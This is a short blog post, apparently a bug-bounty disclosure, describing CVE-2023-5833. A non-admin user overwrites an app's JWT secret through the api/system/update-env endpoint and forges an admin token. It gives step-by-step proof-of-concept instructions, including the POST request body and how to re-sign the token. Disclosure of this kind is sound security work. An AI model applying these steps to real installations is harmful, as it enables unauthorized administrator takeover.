Featured image of post CVE-2023-5833 - Admin account TakeOver
cve web server bounty

CVE-2023-5833 - Admin account TakeOver

Description of the CVE-2023-5833

📝 Description

The endpoint api/system/update-env allows any authenticated users to change env variables of the back-end process. We will abuse this functionnality to change JWT_SECRET env variable (which is used to sign the JWT token).

💥 Proof of Concept

Imagine the following list of accounts is used : img

Login to the user (who is not admin) account and grab the jwt token in the localStorage (with the key : anythingllm_authToken ) img

The jwt token infos are (base64 decoded) :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "id": 2,
  "username": "user",
  "iat": 1694641865,
  "exp": 1697233865
}

Now go on Postman and send a POST request to http://localhost:3001/api/system/update-env with our JWT as Bearer token value and with the following json as body :

1

{"JWTSecret":"admintakeover"}

Now go to jwt.io and put the JWT token, change the id and username, sign the JWT with the secret admintakeover img

Put this token in your localstorage and reload page, you should be admin (we can see i’m admin with the forged jwt token): img

🖊️ références

You can find the report here and the CVE details here.

© 2020 - 2026 Raltheo
Built with Hugo
Theme Stack designed by Jimmy